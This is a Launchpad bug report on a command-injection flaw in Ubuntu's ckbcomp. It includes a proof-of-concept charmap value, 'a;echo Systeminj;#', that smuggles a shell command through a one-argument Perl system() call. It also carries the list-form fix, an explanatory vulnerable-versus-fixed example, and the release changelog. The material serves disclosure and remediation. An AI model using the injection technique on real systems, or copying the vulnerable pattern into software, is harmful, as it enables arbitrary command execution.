command injection in ckbcomp

Bug #782705 reported by Emanuel Bronshtein
This bug affects 1 person

Affects: console-setup (Ubuntu)
Status: Fix Released
Importance: Undecided
Assigned to: Unassigned
Milestone:

Bug Description

Binary package hint: console-setup

/usr/bin/ckbcomp has a command injection bug.

Test case:
root@emanuel-desktop:/tmp# touch "/etc/console-setup/compose.a;echo Systeminj;#.inc" "/usr/share/consoletrans/a;echo Systeminj;#.acm" "/tmp/CKB"
root@emanuel-desktop:/tmp# /usr/bin/ckbcomp "/tmp/CKB" -symbols "/tmp/CKB" -charmap "a;echo Systeminj;#"
WARNING: Can not find "" in "/tmp/CKB".
keymaps 0-127
strings as usual
cat: /etc/console-setup/compose.a: No such file or directory
Systeminj

The bug can be found at:

if ($charmap && -f "/etc/console-setup/compose.${charmap}.inc") {
    system("cat /etc/console-setup/compose.${charmap}.inc");
}

Revision history for this message
Emanuel Bronshtein (e3amn2l) wrote :

Fix:
system("cat" , "/etc/console-setup/compose.${charmap}.inc");
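The following is an added example, not code from ckbcomp or from the reporter, that reproduces the mechanism behind the report and the proposed fix side by side. Perl's one-argument system() hands a string containing shell metacharacters to /bin/sh -c, so the ';' in the charmap name terminates the cat command and the rest runs as a separate command; the list form passes the path to cat as a single argv entry and never consults a shell. The example uses a temporary directory in place of /etc/console-setup so it can be run unprivileged, and the charmap_ok allowlist is an extra check assumed here for defence in depth, not part of the change shipped in 1.70ubuntu4.

```perl
#!/usr/bin/perl
# Added example (not ckbcomp's own code): one-argument vs list-form system().
use strict;
use warnings;
use File::Temp qw(tempdir);

# Constructed sandbox standing in for /etc/console-setup.
my $dir = tempdir(CLEANUP => 1);
open my $fh, '>', "$dir/compose.a;echo Systeminj;#.inc" or die "open: $!";
print $fh "compose table contents\n";
close $fh;

# Attacker-chosen value, the same string the report passes to -charmap.
my $charmap = "a;echo Systeminj;#";

# Vulnerable pattern from the report: the interpolated string contains ';',
# so Perl runs it through the shell, which executes "echo Systeminj" after
# the (failing) cat of "$dir/compose.a".
sub vulnerable_cat {
    my ($charmap) = @_;
    if ($charmap && -f "$dir/compose.${charmap}.inc") {
        system("cat $dir/compose.${charmap}.inc");
    }
}

# Reporter's fix: list form. No shell is involved, so cat receives the
# whole path (including the ';') as one argument and simply prints the file.
sub fixed_cat {
    my ($charmap) = @_;
    if ($charmap && -f "$dir/compose.${charmap}.inc") {
        system("cat", "$dir/compose.${charmap}.inc");
    }
}

# Assumed extra check, not in the shipped fix: charmap names are plain
# identifiers such as ISO-8859-1 or KOI8-R, so reject anything else before
# the value is ever used to build a path or a command.
sub charmap_ok {
    my ($charmap) = @_;
    return defined $charmap && $charmap =~ /\A[A-Za-z0-9_+-]+\z/;
}

print "--- vulnerable (one-argument system) ---\n";
vulnerable_cat($charmap);
print "--- fixed (list-form system) ---\n";
fixed_cat($charmap);
print "--- allowlist ---\n";
printf "%-22s %s\n", $_, charmap_ok($_) ? "accepted" : "rejected"
    for ("ISO-8859-1", "KOI8-R", $charmap);
```

Running it prints "Systeminj" only under the vulnerable call; the list-form call prints the file contents, and the allowlist rejects the injected name outright. The file-test operator -f is not affected either way, since Perl evaluates it directly without a shell, which is why the report's crafted filename passes the existence check in the first place.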

Bryce Harrington (bryce)
Changed in console-setup (Ubuntu):
status: New → Fix Committed
Revision history for this message
Launchpad Janitor (janitor) wrote :

This bug was fixed in the package console-setup - 1.70ubuntu4

---------------
console-setup (1.70ubuntu4) precise; urgency=low

  * Add definitions for four (ignored) dead-keys: dead_belowcomma,
    dead_currency, dead_doublegrave, and dead_invertedbreve. Cherrypick
    from Debian git.
    (LP: #738314)
  * Fix command injection in ckbcomp (thanks to Emanuel Bronshtein)
    (LP: #782705)
 -- Bryce Harrington <email address hidden> Mon, 19 Mar 2012 21:13:39 -0700

Changed in console-setup (Ubuntu):
status: Fix Committed → Fix Released